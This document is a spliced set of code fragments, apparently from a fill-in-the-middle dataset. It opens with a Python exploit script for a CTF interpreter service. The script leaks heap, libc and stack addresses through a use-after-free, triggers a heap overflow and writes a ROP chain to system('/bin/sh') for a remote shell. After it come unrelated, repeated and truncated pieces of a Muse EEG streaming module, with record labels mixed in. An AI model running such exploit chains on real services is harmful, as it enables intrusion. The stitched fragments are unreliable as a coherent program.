# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Global Config
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#TARGET = ('localhost', 4444)
TARGET = ('assignment.ctfcompetition.com', 1337)
# Enable "wireshark" mode, pretty prints all incoming and outgoing network traffic.
NETDEBUG = False
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Encoding and Packing
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def e(d):
"""Encode the given string instance using UTF-8."""
return d.encode('UTF-8')
def d(d):
"""Decode the given bytes instance using UTF-8."""
return d.decode('UTF-8')
def p32(d):
"""Return d packed as 32-bit unsigned integer (little endian)."""
return pack('<I', d)
def u32(d):
"""Return the number represented by d when interpreted as a 32-bit unsigned integer (little endian)."""
return unpack('<I', d)[0]
def p64(d):
"""Return d packed as 64-bit unsigned integer (little endian)."""
return pack('<Q', d)
def u64(d):
"""Return the number represented by d when interpreted as a 64-bit unsigned integer (little endian)."""
return unpack('<Q', d)[0]
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Output
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def print_good(msg):
print(ansi(Term.BOLD) + '[+] ' + msg + ansi(Term.CLEAR))
def print_bad(msg):
print(ansi(Term.COLOR_MAGENTA) + '[-] ' + msg + ansi(Term.CLEAR))
def print_info(msg):
print('[*] ' + msg)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Misc.
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def bytes_and_strings_are_cool(func):
"""Decorator to encode arguments that are string instances."""
def inner(*args, **kwargs):
nargs = tuple(map(lambda arg: e(arg) if isinstance(arg, str) else arg, args))
nkwargs = dict(map(lambda k, v: (k, e(v)) if isinstance(v, str) else (k, v), kwargs))
return func(*nargs, **nkwargs)
return inner
def validate(data, badchars):
"""Assert that no badchar occurs in data."""
assert(all(b not in data for b in badchars))
def is_printable(b):
"""Return true if the given byte is a printable ASCII character."""
return b in e(string.printable)
def hexdump(data):
    """Return a hexdump of the given bytes, similar to `hexdump -C` output."""
    def is_hexdump_printable(b):
        return b in b' 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz`~!@#$%^&*()-_=+[]{}\\|\'";:/?.,<>'
    lines = []
    offset = 0
    while offset < len(data):
        chunk = data[offset:offset + 16]
        hexbytes = ['{:02x}'.format(b) for b in chunk]
        left = ' '.join(hexbytes[:8])
        right = ' '.join(hexbytes[8:])
        text = ''.join(chr(b) if is_hexdump_printable(b) else '.' for b in chunk)
        lines.append('{:08x} {:23} {:23} |{}|'.format(offset, left, right, text))
        offset += 16
    return '\n'.join(lines)
class Term:
    """ANSI SGR parameter strings and escape-sequence delimiters."""
    # Foreground color codes (SGR 30-37).
    COLOR_BLACK = '30'
    COLOR_RED = '31'
    COLOR_GREEN = '32'
    COLOR_BROWN = '33'
    COLOR_BLUE = '34'
    COLOR_MAGENTA = '35'
    COLOR_CYAN = '36'
    COLOR_WHITE = '37'
    # Text attribute codes.
    CLEAR = '0'
    UNDERLINE = '4'
    BOLD = '1'
    # Escape sequence framing: ESC [ <params> m
    ESCAPE_START = '\033['
    ESCAPE_END = 'm'
# TODO rename to style and append Term.Clear ?
def ansi(*args):
    """Construct an ANSI terminal escape code from SGR parameter strings."""
    return Term.ESCAPE_START + ';'.join(args) + Term.ESCAPE_END
class DisconnectException(Exception):
    """Raised when the remote end closes the connection."""
    pass
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Pattern Generation
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class Pattern:
    """De-Bruijn sequence generator."""
    # Symbol set for the pattern: 10 digits + 52 letters = 62 symbols.
    alphabet = string.digits + string.ascii_letters
    def __init__(self, length):
        # Pick the smallest subsequence width n with 62**n >= length, so any
        # n-character window occurs at most once in the generated pattern.
        if length <= len(self.alphabet):
            self._seq = self.alphabet[:length]
        elif length <= len(self.alphabet) ** 2:
            self._seq = self._generate(2)[:length]
        elif length <= len(self.alphabet) ** 3:
            self._seq = self._generate(3)[:length]
        elif length <= len(self.alphabet) ** 4:
            self._seq = self._generate(4)[:length]
        else:
            raise Exception("Pattern length is way to large")
    def _generate(self, n):
        """Generate a De Bruijn sequence."""
        # See https://en.wikipedia.org/wiki/De_Bruijn_sequence
        k = len(self.alphabet)
        a = [0] * k * n
        sequence = []
        def db(t, p):
            # Standard recursive construction via Lyndon words.
            if t > n:
                if n % p == 0:
                    sequence.extend(a[1:p + 1])
            else:
                a[t] = a[t - p]
                db(t + 1, p)
                for j in range(a[t - p] + 1, k):
                    a[t] = j
                    db(t + 1, t)
        db(1, 1)
        return ''.join(self.alphabet[i] for i in sequence)
    def bytes(self):
        """Return this sequence as bytes."""
        return e(self._seq)
    def __str__(self):
        """Return this sequence as string."""
        return self._seq
    @bytes_and_strings_are_cool
    def offset(self, needle):
        """Returns the index of 'needle' in this sequence.
        'needle' should be of type string or bytes. If an integer is provided
        it will be treated as 32-bit or 64-bit little endian number, depending
        on its bit length.
        Raises ValueError if the needle occurs more than once.
        """
        if isinstance(needle, int):
            if needle.bit_length() <= 32:
                needle = p32(needle)
            else:
                needle = p64(needle)
        needle = d(needle)
        idx = self._seq.index(needle)
        # Reject ambiguous needles (possible for windows shorter than n).
        if self._seq[idx+len(needle):].find(needle) != -1:
            raise ValueError("Multiple occurances found!")
        return idx
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Network
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class Channel:
    """Convenience wrapper around a socket."""
    OUTGOING_COLOR = Term.COLOR_RED
    INCOMING_COLOR = Term.COLOR_BLUE
    def __init__(self, sock, verbose):
        self._s = sock
        self._verbose = verbose          # when True, all traffic is prettyprinted
        self._buf = bytearray()          # internal receive buffer
    def _prettyprint(self, data, outgoing):
        """Prettyprint the given data.
        This does the following: All data that is valid ASCII is colorized according to the direction of the traffic.
        Everything else is converted to hex, then printed in bold and underline for visibility.
        Only ASCII is supported as of now. This might be the better choice anyway since otherwise valid UTF-8 might be
        detected in arbitrary binary streams.
        """
        TEXT = 0
        BINARY = 1
        # Various Thresholds for the heuristics below
        X = 4
        Y = 16
        Z = 2
        color = self.OUTGOING_COLOR if outgoing else self.INCOMING_COLOR
        # Step 1: Tag every byte of the input stream with it's detected type.
        parts = []
        curr = ''  # NOTE(review): unused local, kept unchanged
        for b in data:
            if is_printable(b):
                parts.append((TEXT, b))
            else:
                parts.append((BINARY, b))
        # Step 2: Merge neighboring bytes of the same type and convert the sequences to type bytes.
        i = 0
        mergedparts = []
        while i < len(parts):
            t = parts[i][0]
            arr = [parts[i][1]]
            j = i+1
            while j < len(parts) and parts[j][0] == t:
                arr.append(parts[j][1])
                j += 1
            i = j
            # Heuristic: If there are Y ASCII bytes with the same value followed by Z ASCII bytes followed by binary data, treat the Z bytes as binary as well.
            extra = []
            if t == TEXT and len(arr) > Y and i < len(parts) - 1:
                mid = len(arr) - Z - 1
                start, end = mid, mid
                char = arr[mid]
                while start >= 0 and arr[start] == char:
                    start -= 1
                while end < len(arr) and arr[end] == char:
                    end += 1
                # start and end point outside the range of equal-valued characters now.
                if end - start >= Y+2 and end < len(parts):
                    extra = arr[end:]
                    arr = arr[:end]
            mergedparts.append((t, bytes(arr)))
            if extra:
                mergedparts.append((BINARY, bytes(extra)))
        parts = mergedparts
        # Step 3: Merge all parts and prepend the ansi terminal escape sequences for the given type.
        buf = ''
        last = None
        for tag, value in parts:
            # Heuristic: If there is an ASCII sequence of X bytes or less surrounded by binary data, treat those as binary as well.
            if tag == TEXT and len(value) <= X and last == BINARY:
                tag = BINARY
            if tag == TEXT:
                buf += ansi(Term.CLEAR) + ansi(color)
            else:
                buf += ansi(color, Term.BOLD, Term.UNDERLINE)
                value = hexlify(value)
            buf += d(value)
            last = tag
        buf += ansi(Term.CLEAR)
        # Step 4: Print :)
        print(buf, end='')
        sys.stdout.flush()
    def setVerbose(self, verbose):
        """Set verbosity of this channel."""
        self._verbose = verbose
    def recv(self, n=4096):
        """Return up to n bytes of data from the remote end.
        Buffers incoming data internally.
        NOTE: You probably shouldn't be using this method. Use one of the other recvX methods instead.
        """
        if len(self._buf) < n:
            buf = self._s.recv(65536)
            if not buf and not self._buf:
                raise DisconnectException("Server disconnected.")
            if self._verbose:
                self._prettyprint(buf, False)
            self._buf += buf
        # This code also works if n > len(self._buf)
        buf = self._buf[:n]
        self._buf = self._buf[n:]
        return buf
    def recvn(self, n):
        """Return exactly n bytes of data from the remote end."""
        # NOTE(review): reads one byte at a time; fine for small CTF transfers.
        data = []
        while len(data) != n:
            data.append(self.recv(1))
        return b''.join(data)
    @bytes_and_strings_are_cool
    def recvtil(self, delim):
        """Read data from the remote end until delim is found in the data.
        The first occurance of delim is included in the returned buffer.
        """
        buf = b''
        # TODO maybe not make this O(n**2)...
        while not delim in buf:
            buf += self.recv(1)
        return buf
    def recvregex(self, regex):
        """Receive incoming data until it matches the given regex.
        Returns the match object.
        IMPORTANT: Since the data is coming from the network, it's usually
        a bad idea to use a regex such as 'addr: 0x([0-9a-f]+)' as this function
        will return as soon as 'addr: 0xf' is read. Instead, make sure to
        end the regex with a known sequence, e.g. use 'addr: 0x([0-9a-f]+)\\n'.
        """
        if isinstance(regex, str):
            regex = re.compile(regex)
        buf = ''
        match = None
        while not match:
            buf += d(self.recv(1))
            match = regex.search(buf)
        return match
    def recvline(self):
        """Receive and return a line from the remote end.
        The trailing newline character will be included in the returned buffer.
        """
        return self.recvtil('\n')
    def send(self, buf):
        """Send all data in buf to the remote end."""
        if self._verbose:
            self._prettyprint(buf, True)
        self._s.sendall(buf)
    def sendnum(self, n):
        """Send the string representation of n followed by a newline character."""
        self.sendline(str(n))
    @bytes_and_strings_are_cool
    def sendline(self, l):
        """Append a newline to l and send everything to the remote end."""
        self.send(l + b'\n')
    def interact(self):
        """Interact with the remote end: connect stdout and stdin to the socket."""
        # TODO maybe use this at some point: https://docs.python.org/3/library/selectors.html
        self._verbose = False
        try:
            while True:
                available, _, _ = select.select([sys.stdin, self._s], [], [])
                for src in available:
                    if src == sys.stdin:
                        data = sys.stdin.buffer.read1(1024) # Only one read() call, otherwise this breaks when the tty is in raw mode
                        self.send(data)
                    else:
                        data = self.recv(4096)
                        sys.stdout.buffer.write(data)
                        sys.stdout.flush()
        except KeyboardInterrupt:
            return
        except DisconnectException:
            print_info("Server disconnected.")
            return
#
# Telnet emulation
#
def telnet(shell='/bin/bash'):
    """Telnet emulation.
    Opens a PTY on the remote end and connects the master side to the socket.
    Then spawns a shell connected to the slave end and puts the controlling TTY
    on the local machine into raw mode.
    Result: Something similar to a telnet/(plaintext)ssh session.
    Vim, htop, su, less, etc. will work with this.
    !!! This function only works if the channel is connected to a shell !!!
    """
    assert(sys.stdin.isatty())
    c.setVerbose(False)
    # Open a PTY and spawn a bash connected to the slave end on the remote side
    code = 'import pty; pty.spawn([\'{}\', \'-i\'])'.format(shell)
    sendline('python -c "{}"; exit'.format(code))
    time.sleep(0.5) # No really good way of knowing when the shell has opened on the other side...
    # Should maybe put some more functionality into the inline python code instead.
    # Save current TTY settings
    old_settings = termios.tcgetattr(sys.stdin.fileno())
    # Put TTY into raw mode
    tty.setraw(sys.stdin)
    # Resize remote terminal
    # Nice-to-have: also handle terminal resize
    cols, rows = os.get_terminal_size(sys.stdin.fileno())
    sendline('stty rows {} cols {}; echo READY'.format(rows, cols))
    recvtil('READY\r\n') # terminal echo
    recvtil('READY\r\n') # command output
    interact()
    # Restore previous settings
    termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, old_settings)
#
# Convenience wrappers that use the global socket instance
#
def send(b):
    """Send raw bytes via the global channel `c`."""
    c.send(b)
def sendline(l):
c |
def sendnum(n):
    """Send the decimal string for n, newline-terminated, via the global channel."""
    c.sendnum(n)
def recv(n):
    """Receive up to n bytes from the global channel."""
    return c.recv(n)
def recvtil(delim):
    """Receive until delim is seen; delim is included in the result."""
    return c.recvtil(delim)
def recvn(n):
    """Receive exactly n bytes."""
    return c.recvn(n)
def recvline():
    """Receive one newline-terminated line."""
    return c.recvline()
def recvregex(r):
    """Receive until the buffered data matches regex r; return the match object."""
    return c.recvregex(r)
def interact():
    """Hand the connection over to the user (stdin/stdout <-> socket)."""
    c.interact()
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Global Setup
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Open the TCP connection to TARGET and wrap it in a Channel used by all helpers.
s = socket.create_connection(TARGET)
#s.settimeout(2)
c = Channel(s, NETDEBUG)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Your code here
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# One-letter variable names used by the exploit's heap spray.
ALPHABET = 'abcdefghijklmnopqrstuvwxyz'
def evl(code):
    """Send one line of input to the remote interpreter."""
    sendline(code)
def readvar(name):
    """Read back a remote variable's textual value.

    Sends an invalid '=' line first so the remote parser prints 'Bad token'
    and a fresh prompt, giving a known synchronization point before querying.
    """
    evl('=')
    recvtil('Bad token: 0-1\n> ')
    evl(name)
    response = recvtil('> ')
    return response.split(b'\n')[0]
def readintvar(name):
    """Read a remote variable and parse it as an integer."""
    return int(d(readvar(name)))
def readstrvar(name):
    """Read a remote string variable, dropping the first and last byte
    (presumably the surrounding quotes -- confirm against server output)."""
    return readvar(name)[1:-1]
def heapleak():
    """Free the lhs and rhs values during add_assign to leak a heap pointer.

    Returns the leaked address rounded down to 0x1000 (page) granularity.
    """
    # Fill value slots so the next allocation reuses a freed chunk.
    for i in range(16):
        evl('{}'.format(i))
    # Trigger heap info leak
    evl('h=0+0')
    return readintvar('h') & 0xfffffffffffff000
def gc(remaining):
    """Trigger garbage collection by burning the remaining value slots."""
    for i in range(remaining):
        evl('{}'.format(i))
def leak(addr, length):
    """Leaks process memory by abusing the UAF to temporarily inject a fake string.

    addr: absolute address to read from. length: number of bytes to read.
    Relies on the global heap_base set by heapleak().
    """
    fake_str_addr = heap_base + 0xb0
    fake_str = p64(length) + p64(addr)   # fake string header: (length, data ptr)
    evl(b'l="' + fake_str + b'"') # will be at offset 0xb0 from heap start
    for i in range(15):
        evl('{}'.format(i))
    # 19 slots filled
    # allocate 20th slot with integer value containing the addr of our fake string. The allocate_value() during do_add_assign triggers GC and frees the lhs value
    # Then the output value is allocated into the same slot. Since the output value is String (type of x),
    # lhs is turned into a string with controlled pointer
    evl('a={}+x'.format(fake_str_addr))
    gc(16)
    return readstrvar('a')[0:length]
def leak2(addr, length):
    """Same as leak() above, but different offsets for the later heap state."""
    fake_str_addr = heap_base + 0x170
    fake_str = p64(length) + p64(addr)
    evl(b'l="' + fake_str + b'"') # will be at offset 0x170 from heap start
    for i in range(12):
        evl('{}'.format(i))
    evl('a={}+x'.format(fake_str_addr))
    return readstrvar('a')[0:length]
def pwn():
    """Full exploit chain: heap leak -> libc leak -> stack leak -> ROP to system.

    NOTE(review): all libc offsets (0x3c1928, 0x46590, ...) are hardcoded for
    the target's specific libc build -- confirm before reuse.
    """
    global heap_base
    recvtil('>')
    evl('x="XXXXXXXXXXXXXXXX"') # Workaround, need global object or else GC will crash
    # 2 slots always filled from now on (global object and int value 1337)
    heap_base = heapleak()
    # 3 slots always filled from now on
    print_good("Heap base @ 0x{:x}".format(heap_base))
    # Create a smallbin chunk so we can leak a libc pointer
    evl('"{}"'.format('A' * 0x100))
    gc(20 - 4)
    # Leak freelist pointers pointing into the libc
    heap_mem = leak(heap_base, 0x1000)
    for i in range(0, len(heap_mem)-16, 8):
        # Search for 2 consecutive pointers, those will be the flink and blink of the freed smallbin chunk
        flink = u64(heap_mem[i:i+8])
        blink = u64(heap_mem[i+8:i+16])
        if (abs(flink - heap_base) > 0x10000 and
                flink > 0x7f0000000000 and
                flink < 0x800000000000 and
                blink > 0x7f0000000000 and
                blink < 0x800000000000):
            break
    else:
        print_bad("No freelist pointers found :(")
        return
    libc = flink - 0x3c1928
    print_good("libc @ 0x{:x}".format(libc))
    # Leak stack pointer by reading environ pointer in libc
    env_ptr = u64(leak2(libc + 0x3c44a0, 8))
    print_good("stack @ 0x{:x}".format(env_ptr))
    # Calculate addresses
    system = libc + 0x46590
    bin_sh = libc + 0x180103
    pop_rdi = libc + 0x22b9a
    pop_rsi = libc + 0x24885
    pop_rdx = libc + 0x1b8e
    add_rsp_0x48 = libc + 0xf5b8b
    print_good("/bin/sh @ 0x{:x}".format(bin_sh))
    input_buf = env_ptr - 0x328
    print_good("input_buf @ 0x{:x}".format(input_buf))
    ret_addr = env_ptr - 0x328 - 8
    print_good("return address @ 0x{:x}".format(ret_addr))
    # 5 slots always filled from now
    #
    # Heap spray with Property instances to get a controlled heap layout again
    #
    # Make some objects
    evl('l.a=x')
    evl('h.a=x')
    evl('a.a=x')
    evl('b.a=x')
    evl('c.a=x')
    evl('d.a=x')
    evl('e.a=x')
    evl('f.a=x')
    # Trigger GC
    for i in range(9):
        evl('"{}"'.format('A' * 0x10))
    evl('1337')
    # 10 slots used
    # Allocate lots of properties (but no values)
    for o in ['l', 'a', 'h', 'a', 'b', 'c', 'd', 'e', 'f']:
        for p in ALPHABET:
            evl('{}.{}=x'.format(o, p))
    # Set up heap layout for unbounded heap overflow. We need the following layout:
    # | chunk to overflow from | ... | Property to corrupt | ... | Fake string |
    # We overflow into "Fake string" to set it's size to 0 and avoid a segfault.
    for i in range(6):
        evl('1337')
    # Create some properties
    for i in 'ghijk':
        evl('{}=x'.format(i))
    # Fake string with length 0xffffffXX => leads to an integer overflow during string_concat and subsequently a heap buffer overflow
    fake_str = p64(0xffffffffffffffff - 0xf - (0x180 - 0x10)) + p64(0x414141414141) + b'D'*0xf0
    evl(b'n="' + fake_str + b'"')
    payload = b'\x00' * 64 + p64(ord('p')) + p64(input_buf + 16 + 0x100) + p64(input_buf-7)
    payload += b'\x00' * (0x180 - len(payload))
    evl(b'o="' + payload + b'"')
    fake_str_addr = heap_base + 0x1e80
    # Trigger the overflow
    evl('p=o+{}'.format(fake_str_addr))
    # Set up a fake string property in the stack ('p' points to it). We need to leak the binary base from the return address
    payload = b'A' * 0x100
    payload += p64(1) + p64(input_buf + 16 + 0x100 + 0x18) + p64(0)
    payload += p64(8) + p64(ret_addr)
    evl(payload)
    binary = readstrvar('p')
    binary = u64(binary) - 2769
    print_good("binary @ 0x{:x}".format(binary))
    offset_to_ret = ret_addr - (input_buf & 0xffffffffffffff00)
    print_good("offset to return address: 0x{:x}".format(offset_to_ret))
    # Some unfortunate restrictions...
    if offset_to_ret > 0x28 or offset_to_ret < 0:
        print_bad("Bad offset")
        return
    prop_name = p64(binary + 0xAC9)[1]
    if prop_name < ord('A') or prop_name > ord('z'):
        print_bad("Bad propery name: {}".format(prop_name))
        return
    prop_name = chr(prop_name)
    print_good("property name: {}".format(prop_name))
    # Write ROP chain into stack
    payload = b'A' * 56
    payload += p64(pop_rdi)
    payload += p64(bin_sh)
    payload += p64(system)
    validate(payload, [b'\n'])
    evl(payload)
    # Trigger corruption of InputBuffer.ptr to point further down in the stack
    evl('{}=42'.format(prop_name))
    # Next input will be written into the stack frame of readline(). Overwrite the return address with "add rsp, 0x48 ; ret"
    payload = b'A'*offset_to_ret
    payload += p64(add_rsp_0x48)
    validate(payload, [b'\n'])
    evl(payload)
    # Wait a short while and drop into interactive mode == shell
    time.sleep(0.5)
    interact()
if __name__ == '__main__':
    pwn()
| .sendline(l)
| identifier_body |
stream.py | import re
import subprocess
from sys import platform
from time import time
from functools import partial
from shutil import which
from pylsl import StreamInfo, StreamOutlet
import pygatt
from . import backends
from . import helper
from .muse import Muse
from .constants import MUSE_SCAN_TIMEOUT, AUTO_DISCONNECT_DELAY, \
MUSE_NB_EEG_CHANNELS, MUSE_SAMPLING_EEG_RATE, LSL_EEG_CHUNK, \
MUSE_NB_PPG_CHANNELS, MUSE_SAMPLING_PPG_RATE, LSL_PPG_CHUNK, \
MUSE_NB_ACC_CHANNELS, MUSE_SAMPLING_ACC_RATE, LSL_ACC_CHUNK, \
MUSE_NB_GYRO_CHANNELS, MUSE_SAMPLING_GYRO_RATE, LSL_GYRO_CHUNK
def _print_muse_list(muses):
for m in muses:
print(f'Found device {m["name"]}, MAC Address {m["address"]}')
if not muses:
print('No Muses found.')
# Returns a list of available Muse devices.
def list_muses(backend='auto', interface=None):
    """Scan for Muse headsets with the requested BLE backend.

    Returns a list of {'name', 'address'} dicts, or None for the 'bluemuse'
    backend (listing is delegated to the BlueMuse application).
    """
    # Prefer bluetoothctl when available: hcitool (used by pygatt's gatt
    # backend) is deprecated and unreliable on newer stacks.
    if backend == 'auto' and which('bluetoothctl') is not None:
        print("Backend was 'auto' and bluetoothctl was found, using to list muses...")
        return _list_muses_bluetoothctl(MUSE_SCAN_TIMEOUT)
    backend = helper.resolve_backend(backend)
    if backend == 'gatt':
        interface = interface or 'hci0'
        adapter = pygatt.GATTToolBackend(interface)
    elif backend == 'bluemuse':
        print('Starting BlueMuse, see BlueMuse window for interactive list of devices.')
        subprocess.call('start bluemuse:', shell=True)
        return
    elif backend == 'bleak':
        adapter = backends.BleakBackend()
    elif backend == 'bgapi':
        adapter = pygatt.BGAPIBackend(serial_port=interface)
    # NOTE(review): if resolve_backend() ever returns a value not handled
    # above, 'adapter' is unbound and the try block raises NameError --
    # confirm resolve_backend's possible return values.
    try:
        adapter.start()
        print('Searching for Muses, this may take up to 10 seconds...')
        devices = adapter.scan(timeout=MUSE_SCAN_TIMEOUT)
        adapter.stop()
    except pygatt.exceptions.BLEError as e:
        if backend == 'gatt':
            print('pygatt failed to scan for BLE devices. Trying with '
                  'bluetoothctl.')
            return _list_muses_bluetoothctl(MUSE_SCAN_TIMEOUT)
        else:
            raise e
    # Keep only devices advertising a name that contains 'Muse'.
    muses = [d for d in devices if d['name'] and 'Muse' in d['name']]
    _print_muse_list(muses)
    return muses
def _list_muses_bluetoothctl(timeout, verbose=False):
    """Identify Muse BLE devices using bluetoothctl.
    When using backend='gatt' on Linux, pygatt relies on the command line tool
    `hcitool` to scan for BLE devices. `hcitool` is however deprecated, and
    seems to fail on Bluetooth 5 devices. This function roughly replicates the
    functionality of `pygatt.backends.gatttool.gatttool.GATTToolBackend.scan()`
    using the more modern `bluetoothctl` tool.
    Deprecation of hcitool: https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/?id=b1eb2c4cd057624312e0412f6c4be000f7fc3617
    """
    try:
        import pexpect
    except (ImportError, ModuleNotFoundError):
        msg = ('pexpect is currently required to use bluetoothctl from within '
               'a jupter notebook environment.')
        raise ModuleNotFoundError(msg)
    # Run scan using pexpect as subprocess.run returns immediately in jupyter
    # notebooks
    print('Searching for Muses, this may take up to 10 seconds...')
    scan = pexpect.spawn('bluetoothctl scan on')
    try:
        # 'foooooo' is a sentinel that never matches: we deliberately let the
        # scan run until pexpect.TIMEOUT fires after `timeout` seconds.
        scan.expect('foooooo', timeout=timeout)
    except pexpect.EOF:
        before_eof = scan.before.decode('utf-8', 'replace')
        msg = f'Unexpected error when scanning: {before_eof}'
        raise ValueError(msg)
    except pexpect.TIMEOUT:
        if verbose:
            print(scan.before.decode('utf-8', 'replace').split('\r\n'))
    # List devices using bluetoothctl
    list_devices_cmd = ['bluetoothctl', 'devices']
    devices = subprocess.run(
        list_devices_cmd, stdout=subprocess.PIPE).stdout.decode(
        'utf-8').split('\n')
    # Each line looks like "Device <MAC> <name>"; keep only Muse entries.
    muses = [{
        'name': re.findall('Muse.*', string=d)[0],
        'address': re.findall(r'..:..:..:..:..:..', string=d)[0]
    } for d in devices if 'Muse' in d]
    _print_muse_list(muses)
    return muses
# Returns the address of the Muse with the name provided, otherwise returns address of first available Muse.
def find_muse(name=None, backend='auto'):
    """Return the Muse dict matching `name`, else the first one found, else None."""
    muses = list_muses(backend)
    if name:
        return next((m for m in muses if m['name'] == name), None)
    return muses[0] if muses else None
# Begins LSL stream(s) from a Muse with a given address with data sources determined by arguments
def stream(
    address,
    backend='auto',
    interface=None,
    name=None,
    ppg_enabled=False,
    acc_enabled=False,
    gyro_enabled=False,
    eeg_disabled=False,
    preset=None,
    disable_light=False,
    timeout=AUTO_DISCONNECT_DELAY,
):
    """Connect to a Muse headset and stream the enabled data sources over LSL.

    For the 'bluemuse' backend the streaming is delegated to the BlueMuse
    application instead of creating LSL outlets here.
    """
    # If no data types are enabled, we warn the user and return immediately.
    if eeg_disabled and not ppg_enabled and not acc_enabled and not gyro_enabled:
        print('Stream initiation failed: At least one data source must be enabled.')
        return
    # For any backend except bluemuse, we will start LSL streams hooked up to the muse callbacks.
    if backend != 'bluemuse':
        if not address:
            found_muse = find_muse(name, backend)
            if not found_muse:
                return
            else:
                # FIX: these two assignments were missing (garbled) in the
                # source; restored from the duplicate definition of stream()
                # later in the file.
                address = found_muse['address']
                name = found_muse['name']
        if not eeg_disabled:
            eeg_info = StreamInfo('Muse', 'EEG', MUSE_NB_EEG_CHANNELS, MUSE_SAMPLING_EEG_RATE, 'float32',
                                  'Muse%s' % address)
            eeg_info.desc().append_child_value("manufacturer", "Muse")
            eeg_channels = eeg_info.desc().append_child("channels")
            for c in ['TP9', 'AF7', 'AF8', 'TP10', 'Right AUX']:
                eeg_channels.append_child("channel") \
                    .append_child_value("label", c) \
                    .append_child_value("unit", "microvolts") \
                    .append_child_value("type", "EEG")
            eeg_outlet = StreamOutlet(eeg_info, LSL_EEG_CHUNK)
        if ppg_enabled:
            ppg_info = StreamInfo('Muse', 'PPG', MUSE_NB_PPG_CHANNELS, MUSE_SAMPLING_PPG_RATE,
                                  'float32', 'Muse%s' % address)
            ppg_info.desc().append_child_value("manufacturer", "Muse")
            ppg_channels = ppg_info.desc().append_child("channels")
            for c in ['PPG1', 'PPG2', 'PPG3']:
                ppg_channels.append_child("channel") \
                    .append_child_value("label", c) \
                    .append_child_value("unit", "mmHg") \
                    .append_child_value("type", "PPG")
            ppg_outlet = StreamOutlet(ppg_info, LSL_PPG_CHUNK)
        if acc_enabled:
            acc_info = StreamInfo('Muse', 'ACC', MUSE_NB_ACC_CHANNELS, MUSE_SAMPLING_ACC_RATE,
                                  'float32', 'Muse%s' % address)
            acc_info.desc().append_child_value("manufacturer", "Muse")
            acc_channels = acc_info.desc().append_child("channels")
            for c in ['X', 'Y', 'Z']:
                acc_channels.append_child("channel") \
                    .append_child_value("label", c) \
                    .append_child_value("unit", "g") \
                    .append_child_value("type", "accelerometer")
            acc_outlet = StreamOutlet(acc_info, LSL_ACC_CHUNK)
        if gyro_enabled:
            gyro_info = StreamInfo('Muse', 'GYRO', MUSE_NB_GYRO_CHANNELS, MUSE_SAMPLING_GYRO_RATE,
                                   'float32', 'Muse%s' % address)
            gyro_info.desc().append_child_value("manufacturer", "Muse")
            gyro_channels = gyro_info.desc().append_child("channels")
            for c in ['X', 'Y', 'Z']:
                gyro_channels.append_child("channel") \
                    .append_child_value("label", c) \
                    .append_child_value("unit", "dps") \
                    .append_child_value("type", "gyroscope")
            gyro_outlet = StreamOutlet(gyro_info, LSL_GYRO_CHUNK)
        def push(data, timestamps, outlet):
            # Forward each sample (column) of a chunk to the LSL outlet.
            for ii in range(data.shape[1]):
                outlet.push_sample(data[:, ii], timestamps[ii])
        push_eeg = partial(push, outlet=eeg_outlet) if not eeg_disabled else None
        push_ppg = partial(push, outlet=ppg_outlet) if ppg_enabled else None
        push_acc = partial(push, outlet=acc_outlet) if acc_enabled else None
        push_gyro = partial(push, outlet=gyro_outlet) if gyro_enabled else None
        muse = Muse(address=address, callback_eeg=push_eeg, callback_ppg=push_ppg, callback_acc=push_acc, callback_gyro=push_gyro,
                    backend=backend, interface=interface, name=name, preset=preset, disable_light=disable_light)
        didConnect = muse.connect()
        if didConnect:
            print('Connected.')
            muse.start()
            eeg_string = " EEG" if not eeg_disabled else ""
            ppg_string = " PPG" if ppg_enabled else ""
            acc_string = " ACC" if acc_enabled else ""
            gyro_string = " GYRO" if gyro_enabled else ""
            print("Streaming%s%s%s%s..." %
                  (eeg_string, ppg_string, acc_string, gyro_string))
            # Auto-disconnect once no data has arrived for `timeout` seconds.
            while time() - muse.last_timestamp < timeout:
                try:
                    backends.sleep(1)
                except KeyboardInterrupt:
                    muse.stop()
                    muse.disconnect()
                    break
            print('Disconnected.')
    # For bluemuse backend, we don't need to create LSL streams directly, since these are handled in BlueMuse itself.
    else:
        # Toggle all data stream types in BlueMuse.
        subprocess.call('start bluemuse://setting?key=eeg_enabled!value={}'.format('false' if eeg_disabled else 'true'), shell=True)
        subprocess.call('start bluemuse://setting?key=ppg_enabled!value={}'.format('true' if ppg_enabled else 'false'), shell=True)
        subprocess.call('start bluemuse://setting?key=accelerometer_enabled!value={}'.format('true' if acc_enabled else 'false'), shell=True)
        subprocess.call('start bluemuse://setting?key=gyroscope_enabled!value={}'.format('true' if gyro_enabled else 'false'), shell=True)
        muse = Muse(address=address, callback_eeg=None, callback_ppg=None, callback_acc=None, callback_gyro=None,
                    backend=backend, interface=interface, name=name)
        muse.connect()
        if not address and not name:
            print('Targeting first device BlueMuse discovers...')
        else:
            print('Targeting device: '
                  + ':'.join(filter(None, [name, address])) + '...')
        print('\n*BlueMuse will auto connect and stream when the device is found. \n*You can also use the BlueMuse interface to manage your stream(s).')
        muse.start()
| address = found_muse['address']
name = found_muse['name'] | conditional_block |
stream.py | import re
import subprocess
from sys import platform
from time import time
from functools import partial
from shutil import which
from pylsl import StreamInfo, StreamOutlet
import pygatt
from . import backends
from . import helper
from .muse import Muse
